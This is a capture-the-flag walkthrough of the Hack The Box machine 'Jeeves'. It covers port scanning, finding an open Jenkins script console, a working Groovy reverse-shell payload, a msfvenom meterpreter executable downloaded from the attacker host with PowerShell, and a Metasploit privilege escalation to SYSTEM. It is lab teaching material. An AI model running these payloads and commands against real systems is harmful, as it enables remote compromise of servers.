Jeeves

Abused Jenkins Script Console.

Link

Room Link


Process


You rang? Let’s try to take on Jeeves.

First things first, let’s run the nmap to identify the services running on the machine.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ sudo nmap -sC -sV -A -O -oN nmap 10.10.10.63                      
[sudo] password for kali: 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-10 02:07 +1100
Nmap scan report for 10.10.10.63
Host is up (0.45s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-09T20:10:56
|_  start_date: 2026-01-09T20:07:55
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5h02m46s, deviation: 0s, median: 5h02m45s

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   528.79 ms 10.10.16.1
2   528.98 ms 10.10.10.63

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.87 seconds

  


Give nmap a run against all the ports to try and find ports running on non-standard ports.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ sudo nmap -sS -p- -oN nmapfull 10.10.10.63                        
[sudo] password for kali: 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-10 02:07 +1100
Nmap scan report for 10.10.10.63
Host is up (0.38s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2

Nmap done: 1 IP address (1 host up) scanned in 1002.68 seconds

  


Run curl with the -I option to pull the headers to try and identify the technology.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ curl -I http://10.10.10.63       
HTTP/1.1 200 OK
Content-Length: 503
Content-Type: text/html
Last-Modified: Mon, 06 Nov 2017 02:34:40 GMT
Accept-Ranges: bytes
ETag: "2277f7cba756d31:0"
Server: Microsoft-IIS/10.0
Date: Fri, 09 Jan 2026 20:14:40 GMT

  


Check the landing page running on port 80.


Review the source code for the landing page looking for any juicy bits.

view-source:http://10.10.10.63/

<!DOCTYPE html>
<html>
<head>
<title>Ask Jeeves</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
<form class="form-wrapper cf" action="error.html">
    <div class="byline"><p><a href="#">Web</a>, <a href="#">images</a>, <a href="#">news</a>, and <a href="#">lots of answers</a>.</p></div>
  	<input type="text" placeholder="Search here..." required>
	  <button type="submit">Search</button>
    <div class="byline-bot">Skins</div>
</form>
</body>

</html>

  


Check the for the existence of a robots.txt page.


Check the error.html and notice the stack trace.


Pull the source code for the error html and notice that it is just a picture and not an actual stack trace.

view-source:http://10.10.10.63/error.html

<img src="jeeves.PNG" width="90%" height="100%">

  


Run ffuf to fuzz for interesting files and folders on port 80.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.63/FUZZ -fw 38

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.63/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 38
________________________________________________

:: Progress: [220560/220560] :: Job [1/1] :: 1904 req/sec :: Duration: [0:01:58] :: Errors: 0 ::

  


Run curl with the -I option on port 50000 to view the headers to try and fingerprint the technology.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ curl -I http://10.10.10.63:50000
HTTP/1.1 404 Not Found
Date: Fri, 09 Jan 2026 20:24:43 GMT
Cache-Control: must-revalidate,no-cache,no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 315
Server: Jetty(9.4.z-SNAPSHOT)

  


Check the landing page on port 50000.


Check the source code for the landing page that is running on page 500000.

view-source:http://10.10.10.63:50000/

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 404 Not Found</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /. Reason:
<pre>    Not Found</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.4.z-SNAPSHOT</a><hr/>

</body>
</html>

  


Check for the existence of a robots file for the web server that is running on port 50000.


Run ffuf against port 50000 to look for directories and files.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.63:50000/FUZZ -fw 38

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.63:50000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 38
________________________________________________

askjeeves               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 15ms]
:: Progress: [220560/220560] :: Job [1/1] :: 2531 req/sec :: Duration: [0:01:35] :: Errors: 0 ::

  


Check the /askjeeves/ directory to find Jenkins installation.


Note the Jenkins version number.


Click on Manage Jenkins on the left-hand menu.


Notice that we can now execute arbitrary Groovy code.


Start a netcat listener.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ sudo nc -nlvp 443
listening on [any] 443 ...

  


Go to revshells to generate a Groovy reverse shell.

https://www.revshells.com/


Update the payload to use cmd.exe since this is Windows machine.

groovy

String host="10.10.16.6";
int port=443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

  


Use that payload in the script console. Click Run.


Check the listener and catch the shell.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ sudo nc -nlvp 443                                                 
[sudo] password for kali: 
listening on [any] 443 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.63] 49676

  
cmd.exe

Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>

  


Run whoami and whoami /priv to see who we are. Note the SeImpersonatePrivilege.

cmd.exe

C:\Users\Administrator\.jenkins>whoami 
whoami
jeeves\kohsuke

C:\Users\Administrator\.jenkins>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

  


Run systeminfo to try to identify the system that we are running on.

cmd.exe

C:\Users\Administrator\.jenkins>systeminfo
systeminfo

Host Name:                 JEEVES
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00331-20304-47406-AA297
Original Install Date:     10/25/2017, 4:45:33 PM
System Boot Time:          1/9/2026, 3:07:46 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.24504846.B64.2501180334, 1/18/2025
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,169 MB
Virtual Memory: Max Size:  2,687 MB
Virtual Memory: Available: 1,752 MB
Virtual Memory: In Use:    935 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 10 Hotfix(s) Installed.
                           [01]: KB3150513
                           [02]: KB3161102
                           [03]: KB3172729
                           [04]: KB3173428
                           [05]: KB4021702
                           [06]: KB4022633
                           [07]: KB4033631
                           [08]: KB4035632
                           [09]: KB4051613
                           [10]: KB4041689
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.63
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

  


Get the user.txt flag.

cmd.exe

C:\Users\kohsuke\Desktop>type user.txt
type user.txt
<redacted>
C:\Users\kohsuke\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.63
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Tunnel adapter isatap.{4079B648-26D5-4A56-9108-2A55EC5CE6CA}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

  


Generate a meterpreter payload executable.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f exe -o meter.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 7168 bytes
Saved as: meter.exe
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ python3 -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

  


Transfer the meter.exe to the victim machine.

cmd.exe

C:\Users\kohsuke>powershell -c "Invoke-WebRequest -Uri 'http://10.10.16.6/meter.exe' -OutFile 'C:\Users\kohsuke\meter.exe'
powershell -c "Invoke-WebRequest -Uri 'http://10.10.16.6/meter.exe' -OutFile 'C:\Users\kohsuke\meter.exe'

C:\Users\kohsuke>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\kohsuke

01/10/2026  05:32 AM    <DIR>          .
01/10/2026  05:32 AM    <DIR>          ..
11/03/2017  09:51 PM    <DIR>          .groovy
11/03/2017  10:15 PM    <DIR>          Contacts
01/09/2026  03:51 PM    <DIR>          Desktop
11/03/2017  10:18 PM    <DIR>          Documents
11/03/2017  10:15 PM    <DIR>          Downloads
11/03/2017  10:15 PM    <DIR>          Favorites
11/03/2017  10:22 PM    <DIR>          Links
01/10/2026  05:32 AM             7,168 meter.exe
11/03/2017  10:15 PM    <DIR>          Music
11/03/2017  10:22 PM    <DIR>          OneDrive
11/04/2017  02:10 AM    <DIR>          Pictures
11/03/2017  10:15 PM    <DIR>          Saved Games
11/03/2017  10:16 PM    <DIR>          Searches
11/03/2017  10:15 PM    <DIR>          Videos
               1 File(s)          7,168 bytes
              15 Dir(s)   2,660,552,704 bytes free

  


Start a handler to catch the payload.

bash

┌──(kali㉿kali)-[~/Documents/htb/jeeves]
└─$ msfconsole -q             
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
lhost => tun0
msf exploit(multi/handler) > set lhost tun0
lhost => tun0
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.6:4444

  


Run the meter.exe payload.

cmd.exe

C:\Users\kohsuke> .\meter.exe

  


Check the handler and catch the shell.

bash

[*] Started reverse TCP handler on 10.10.16.6:4444 
[*] Sending stage (188998 bytes) to 10.10.10.63
[*] Meterpreter session 1 opened (10.10.16.6:4444 -> 10.10.10.63:49683) at 2026-01-10 16:34:13 +1100

meterpreter >

  


Run the local_exploit_suggester exploit to check for potential exploits.

bash

meterpreter > 
Background session 1? [y/N]  
msf exploit(multi/handler) > search suggest

Matching Modules
================

   #   Name                                                                       Disclosure Date  Rank       Check  Description
   -   ----                                                                       ---------------  ----       -----  -----------
   0   auxiliary/server/icmp_exfil                                                .                normal     No     ICMP Exfiltration Service
   1   exploit/windows/browser/ms10_018_ie_behaviors                              2010-03-09       good       No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
   2     \_ target: (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista  .                .          .      .
   3     \_ target: IE 6 SP0-SP2 (onclick)                                        .                .          .      .
   4     \_ target: IE 7.0 (marquee)                                              .                .          .      .
   5   post/multi/recon/local_exploit_suggester                                   .                normal     No     Multi Recon Local Exploit Suggester
   6   auxiliary/scanner/http/nagios_xi_scanner                                   .                normal     No     Nagios XI Scanner
   7   post/osx/gather/enum_colloquy                                              .                normal     No     OS X Gather Colloquy Enumeration
   8     \_ action: ACCOUNTS                                                      .                .          .      Collect the preferences plists
   9     \_ action: ALL                                                           .                .          .      Collect both the plists and chat logs
   10    \_ action: CHATS                                                         .                .          .      Collect chat logs with a pattern
   11  post/osx/manage/sonic_pi                                                   .                normal     No     OS X Manage Sonic Pi
   12    \_ action: Run                                                           .                .          .      Run Sonic Pi code
   13    \_ action: Stop                                                          .                .          .      Stop all jobs
   14  post/multi/recon/persistence_suggester                                     .                normal     No     Persistence Exploit Suggester
   15  exploit/multi/http/torchserver_cve_2023_43654                              2023-10-03       excellent  Yes    PyTorch Model Server Registration and Deserialization RCE
   16  exploit/windows/http/sharepoint_data_deserialization                       2020-07-14       excellent  Yes    SharePoint DataSet / DataTable Deserialization
   17    \_ target: Windows EXE Dropper                                           .                .          .      .
   18    \_ target: Windows Command                                               .                .          .      .
   19    \_ target: Windows Powershell                                            .                .          .      .
   20  exploit/windows/smb/timbuktu_plughntcommand_bof                            2009-06-25       great      No     Timbuktu PlughNTCommand Named Pipe Buffer Overflow


Interact with a module by name or index. For example info 20, use 20 or use exploit/windows/smb/timbuktu_plughntcommand_bof

msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.63 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/lib/rex/proto/ldap.rb:13: warning: already initialized constant Net::LDAP::WhoamiOid
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/net-ldap-0.20.0/lib/net/ldap.rb:344: warning: previous definition of WhoamiOid was here
[*] 10.10.10.63 - 229 exploit checks are being tried...
[+] 10.10.10.63 - exploit/windows/local/bits_ntlm_token_impersonation: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The target appears to be vulnerable. Vulnerable Windows 10 v1511 build detected!
[+] 10.10.10.63 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 43 / 43
[*] 10.10.10.63 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bits_ntlm_token_impersonation            Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1511 build detected!
 7   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/ms16_075_reflection_juicy                Yes                      The target appears to be vulnerable.
 11  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.

<snip>


  


Run the ms16_075_reflection_juicy payload.

bash

msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/local/ms16_075_reflection_juicy) > set session 1
session => 1
msf exploit(windows/local/ms16_075_reflection_juicy) > set lhost tun0
lhost => tun0
msf exploit(windows/local/ms16_075_reflection_juicy) > set lhost tun0
lhost => tun0
msf exploit(windows/local/ms16_075_reflection_juicy) > set lport 4445
lport => 4445
msf exploit(windows/local/ms16_075_reflection_juicy) > exploit
[*] Started reverse TCP handler on 10.10.16.6:4445 
[+] Target appears to be vulnerable (Windows 10 version 1511)
[*] Launching notepad to host the exploit...
[+] Process 2744 launched.
[*] Reflectively injecting the exploit DLL into 2744...
[*] Injecting exploit into 2744...
[*] Exploit injected. Injecting exploit configuration into 2744...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (188998 bytes) to 10.10.10.63
[*] Meterpreter session 2 opened (10.10.16.6:4445 -> 10.10.10.63:49690) at 2026-01-10 16:44:28 +1100

meterpreter >

  


Check where the flag usually is.

bash

meterpreter > shell
Process 212 created.
Channel 1 created.

  
cmd.exe

Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,660,487,168 bytes free

C:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere.  Look deeper.

  


Check the alternative data streams to try to find the flag.

cmd.exe

C:\Users\Administrator\Desktop>dir /r
dir /r
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,660,487,168 bytes free

  


Get the root flag.

cmd.exe

C:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
<redacted>

C:\Users\Administrator\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.63
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Tunnel adapter isatap.{4079B648-26D5-4A56-9108-2A55EC5CE6CA}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

  


Looks like we gave Jeeves a run for his money. I look forward to seeing you in the next one.